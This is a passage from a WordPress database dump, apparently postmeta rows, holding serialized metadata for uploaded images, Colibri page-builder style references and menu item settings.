;s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1848,1416,'_wp_attached_file','2023/09/rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg'),(1849,1416,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1748;s:6:\"height\";i:2328;s:4:\"file\";s:73:\"2023/09/rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\";s:8:\"filesize\";i:140655;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:73:\"rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8676;}s:5:\"large\";a:5:{s:4:\"file\";s:74:\"rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-769x1024.jpg\";s:5:\"width\";i:769;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60470;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:73:\"rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4097;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:74:\"rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-768x1023.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1023;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60076;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:75:\"rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-1153x1536.jpg\";s:5:\"width\";i:1153;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120565;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:75:\"rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-1538x2048.jpg\";s:5:\"width\";i:1538;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:192327;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1850,1417,'_wp_attached_file','2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg'),(1851,1417,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:96:\"2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\";s:8:\"filesize\";i:179176;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:96:\"cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207612475-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10547;}s:5:\"large\";a:5:{s:4:\"file\";s:98:\"cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207612475-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78078;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:96:\"cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207612475-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4097;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:96:\"cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207612475-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47828;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:98:\"cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207612475-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:152430;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1852,1417,'_oembed_140be3c5637645a4fa18fadb21e68562','{{unknown}}'),(1853,1418,'_wp_attached_file','2023/09/colibri-image-54.png'),(1854,1418,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:28:\"2023/09/colibri-image-54.png\";s:8:\"filesize\";i:6768;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1855,1419,'_wp_attached_file','2023/09/colibri-image-55.png'),(1856,1419,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:28:\"2023/09/colibri-image-55.png\";s:8:\"filesize\";i:8695;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1857,1420,'_wp_attached_file','2023/09/colibri-image-56.png'),(1858,1420,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:28:\"2023/09/colibri-image-56.png\";s:8:\"filesize\";i:7209;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1863,138,'_wp_old_date','2022-04-29'),(1865,619,'_wp_old_date','2022-04-29'),(1867,183,'_wp_old_date','2022-04-29'),(1868,186,'_wp_old_date','2022-04-29'),(1873,1422,'extend_builder','a:2:{s:4:\"json\";i:612;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:5:{i:0;i:413;i:1;i:417;i:2;i:418;i:3;i:419;i:4;i:420;}}}'),(1874,1423,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:37:{i:0;i:338;i:1;i:339;i:2;i:340;i:3;i:341;i:4;i:342;i:5;i:344;i:6;i:345;i:7;i:346;i:8;i:347;i:9;i:348;i:10;i:349;i:11;i:350;i:12;i:352;i:13;i:353;i:14;i:354;i:15;i:355;i:16;i:356;i:17;i:358;i:18;i:359;i:19;i:360;i:20;i:361;i:21;i:362;i:22;i:363;i:23;i:364;i:24;i:366;i:25;i:381;i:26;i:382;i:27;i:383;i:28;i:384;i:29;i:386;i:30;i:387;i:31;i:388;i:32;i:389;i:33;i:390;i:34;i:391;i:35;i:392;i:36;i:394;}}}'),(1875,1424,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:37:{i:0;i:338;i:1;i:339;i:2;i:340;i:3;i:341;i:4;i:342;i:5;i:344;i:6;i:345;i:7;i:346;i:8;i:347;i:9;i:348;i:10;i:349;i:11;i:350;i:12;i:352;i:13;i:353;i:14;i:354;i:15;i:355;i:16;i:356;i:17;i:358;i:18;i:359;i:19;i:360;i:20;i:361;i:21;i:362;i:22;i:363;i:23;i:364;i:24;i:366;i:25;i:381;i:26;i:382;i:27;i:383;i:28;i:384;i:29;i:386;i:30;i:387;i:31;i:388;i:32;i:389;i:33;i:390;i:34;i:391;i:35;i:392;i:36;i:394;}}}'),(1876,1425,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:37:{i:0;i:338;i:1;i:339;i:2;i:340;i:3;i:341;i:4;i:342;i:5;i:344;i:6;i:345;i:7;i:346;i:8;i:347;i:9;i:348;i:10;i:349;i:11;i:350;i:12;i:352;i:13;i:353;i:14;i:354;i:15;i:355;i:16;i:356;i:17;i:358;i:18;i:359;i:19;i:360;i:20;i:361;i:21;i:362;i:22;i:363;i:23;i:364;i:24;i:366;i:25;i:381;i:26;i:382;i:27;i:383;i:28;i:384;i:29;i:386;i:30;i:387;i:31;i:388;i:32;i:389;i:33;i:390;i:34;i:391;i:35;i:392;i:36;i:394;}}}'),(1877,1426,'_menu_item_type','post_type'),(1878,1426,'_menu_item_menu_item_parent','0'),(1879,1426,'_menu_item_object_id','126'),(1880,1426,'_menu_item_object','page'),(1881,1426,'_menu_item_target',''),(1882,1426,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1883,1426,'_menu_item_xfn',''),(1884,1426,'_menu_item_url',''),(1887,1427,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:37:{i:0;i:338;i:1;i:339;i:2;i:340;i:3;i:341;i:4;i:342;i:5;i:344;i:6;i:345;i:7;i:346;i:8;i:347;i:9;i:348;i:10;i:349;i:11;i:350;i:12;i:352;i:13;i:353;i:14;i:354;i:15;i:355;i:16;i:356;i:17;i:358;i:18;i:359;i:19;i:360;i:20;i:361;i:21;i:362;i:22;i:363;i:23;i:364;i:24;i:366;i:25;i:381;i:26;i:382;i:27;i:383;i:28;i:384;i:29;i:386;i:30;i:387;i:31;i:388;i:32;i:389;i:33;i:390;i:34;i:391;i:35;i:392;i:36;i:394;}}}'),(1888,1428,'extend_builder','a:2:{s:4:\"json\";i:612;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:5:{i:0;i:413;i:1;i:417;i:2;i:418;i:3;i:419;i:4;i:420;}}}'),(1889,1430,'is_colibri-wp_front_page','1'),(1890,1430,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:21:{i:0;i:228;i:1;i:271;i:2;i:335;i:3;i:336;i:4;i:337;i:5;i:331;i:6;i:333;i:7;i:334;i:8;i:272;i:9;i:273;i:10;i:274;i:11;i:275;i:12;i:276;i:13;i:273;i:14;i:274;i:15;i:275;i:16;i:276;i:17;i:273;i:18;i:274;i:19;i:275;i:20;i:276;}}}'),(1892,1434,'extend_builder','a:2:{s:4:\"json\";i:612;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:5:{i:0;i:413;i:1;i:417;i:2;i:418;i:3;i:419;i:4;i:420;}}}'),(1893,1436,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:37:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:677;i:29;i:678;i:30;i:679;i:31;i:220;i:32;i:221;i:33;i:222;i:34;i:223;i:35;i:224;i:36;i:225;}}}'),(1899,1443,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:37:{i:0;i:338;i:1;i:339;i:2;i:340;i:3;i:341;i:4;i:342;i:5;i:344;i:6;i:345;i:7;i:346;i:8;i:347;i:9;i:348;i:10;i:349;i:11;i:350;i:12;i:352;i:13;i:353;i:14;i:354;i:15;i:355;i:16;i:356;i:17;i:358;i:18;i:359;i:19;i:360;i:20;i:361;i:21;i:362;i:22;i:363;i:23;i:364;i:24;i:366;i:25;i:381;i:26;i:382;i:27;i:383;i:28;i:384;i:29;i:386;i:30;i:387;i:31;i:388;i:32;i:389;i:33;i:390;i:34;i:391;i:35;i:392;i:36;i:394;}}}'),(1904,1448,'_wp_attached_file','2023/09/tornado1.png'),(1905,1448,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:333;s:6:\"height\";i:480;s:4:\"file\";s:20:\"2023/09/tornado1.png\";s:8:\"filesize\";i:336449;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"tornado1-208x300.png\";s:5:\"width\";i:208;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:123636;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"tornado1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:48311;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1906,1449,'_wp_attached_file','2023/09/cropped-tornado1.png'),(1907,1449,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:333;s:6:\"height\";i:333;s:4:\"file\";s:28:\"2023/09/cropped-tornado1.png\";s:8:\"filesize\";i:217946;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"cropped-tornado1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:167968;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"cropped-tornado1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47176;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1909,1451,'_wp_attached_file','2023/09/tornado.jpg'),(1910,1451,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:665;s:6:\"height\";i:958;s:4:\"file\";s:19:\"2023/09/tornado.jpg\";s:8:\"filesize\";i:194403;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"tornado-208x300.jpg\";s:5:\"width\";i:208;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19545;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"tornado-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7996;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1911,1452,'_wp_attached_file','2023/09/cropped-tornado.jpg'),(1912,1452,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:645;s:6:\"height\";i:666;s:4:\"file\";s:27:\"2023/09/cropped-tornado.jpg\";s:8:\"filesize\";i:95789;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"cropped-tornado-291x300.jpg\";s:5:\"width\";i:291;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24335;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"cropped-tornado-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7750;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1913,1453,'_wp_attached_file','2023/09/cropped-tornado-1.jpg'),(1914,1453,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:649;s:6:\"height\";i:936;s:4:\"file\";s:29:\"2023/09/cropped-tornado-1.jpg\";s:8:\"filesize\";i:146570;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"cropped-tornado-1-208x300.jpg\";s:5:\"width\";i:208;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19506;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"cropped-tornado-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8066;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1915,1455,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:31:{i:0;i:338;i:1;i:388;i:2;i:389;i:3;i:390;i:4;i:391;i:5;i:392;i:6;i:394;i:7;i:353;i:8;i:354;i:9;i:355;i:10;i:356;i:11;i:358;i:12;i:359;i:13;i:360;i:14;i:361;i:15;i:362;i:16;i:363;i:17;i:364;i:18;i:366;i:19;i:381;i:20;i:382;i:21;i:383;i:22;i:384;i:23;i:386;i:24;i:387;i:25;i:346;i:26;i:347;i:27;i:348;i:28;i:349;i:29;i:350;i:30;i:352;}}}'),(1921,1462,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:31:{i:0;i:338;i:1;i:388;i:2;i:389;i:3;i:390;i:4;i:391;i:5;i:392;i:6;i:394;i:7;i:353;i:8;i:354;i:9;i:355;i:10;i:356;i:11;i:358;i:12;i:359;i:13;i:360;i:14;i:361;i:15;i:362;i:16;i:363;i:17;i:364;i:18;i:366;i:19;i:381;i:20;i:382;i:21;i:383;i:22;i:384;i:23;i:386;i:24;i:387;i:25;i:346;i:26;i:347;i:27;i:348;i:28;i:349;i:29;i:350;i:30;i:352;}}}'),(1927,1469,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:31:{i:0;i:338;i:1;i:388;i:2;i:389;i:3;i:390;i:4;i:391;i:5;i:392;i:6;i:394;i:7;i:353;i:8;i:354;i:9;i:355;i:10;i:356;i:11;i:358;i:12;i:359;i:13;i:360;i:14;i:361;i:15;i:362;i:16;i:363;i:17;i:364;i:18;i:366;i:19;i:381;i:20;i:382;i:21;i:383;i:22;i:384;i:23;i:386;i:24;i:387;i:25;i:346;i:26;i:347;i:27;i:348;i:28;i:349;i:29;i:350;i:30;i:352;}}}'),(1933,1475,'_wp_attached_file','2023/09/cropped-cropped-tornado.jpg'),(1934,1475,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:645;s:6:\"height\";i:645;s:4:\"file\";s:35:\"2023/09/cropped-cropped-tornado.jpg\";s:8:\"filesize\";i:94471;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"cropped-cropped-tornado-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25070;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"cropped-cropped-tornado-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7760;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1935,1477,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:31:{i:0;i:338;i:1;i:388;i:2;i:389;i:3;i:390;i:4;i:391;i:5;i:392;i:6;i:394;i:7;i:353;i:8;i:354;i:9;i:355;i:10;i:356;i:11;i:358;i:12;i:359;i:13;i:360;i:14;i:361;i:15;i:362;i:16;i:363;i:17;i:364;i:18;i:366;i:19;i:381;i:20;i:382;i:21;i:383;i:22;i:384;i:23;i:386;i:24;i:387;i:25;i:346;i:26;i:347;i:27;i:348;i:28;i:349;i:29;i:350;i:30;i:352;}}}'),(1941,1484,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:31:{i:0;i:338;i:1;i:388;i:2;i:389;i:3;i:390;i:4;i:391;i:5;i:392;i:6;i:394;i:7;i:353;i:8;i:354;i:9;i:355;i:10;i:356;i:11;i:358;i:12;i:359;i:13;i:360;i:14;i:361;i:15;i:362;i:16;i:363;i:17;i:364;i:18;i:366;i:19;i:381;i:20;i:382;i:21;i:383;i:22;i:384;i:23;i:386;i:24;i:387;i:25;i:346;i:26;i:347;i:27;i:348;i:28;i:349;i:29;i:350;i:30;i:352;}}}'),(1946,1489,'_wp_attached_file','2023/09/raychel-sanner-cswvKS59E90-unsplash-scaled.jpg'),(1947,1489,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1920;s:4:\"file\";s:54:\"2023/09/raychel-sanner-cswvKS59E90-unsplash-scaled.jpg\";s:8:\"filesize\";i:318416;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:47:\"raychel-sanner-cswvKS59E90-unsplash-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12242;}s:5:\"large\";a:5:{s:4:\"file\";s:48:\"raychel-sanner-cswvKS59E90-unsplash-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63222;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:47:\"raychel-sanner-cswvKS59E90-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7110;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:47:\"raychel-sanner-cswvKS59E90-unsplash-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41190;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:49:\"raychel-sanner-cswvKS59E90-unsplash-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:121912;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:49:\"raychel-sanner-cswvKS59E90-unsplash-2048x1536.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:203814;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:39:\"raychel-sanner-cswvKS59E90-unsplash.jpg\";}'),(1948,1490,'_wp_attached_file','2023/09/cropped-raychel-sanner-cswvKS59E90-unsplash-scaled-1.jpg'),(1949,1490,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1919;s:4:\"file\";s:64:\"2023/09/cropped-raychel-sanner-cswvKS59E90-unsplash-scaled-1.jpg\";s:8:\"filesize\";i:254167;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"cropped-raychel-sanner-cswvKS59E90-unsplash-scaled-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14751;}s:5:\"large\";a:5:{s:4:\"file\";s:66:\"cropped-raychel-sanner-cswvKS59E90-unsplash-scaled-1-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83022;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"cropped-raychel-sanner-cswvKS59E90-unsplash-scaled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7254;}s:12:\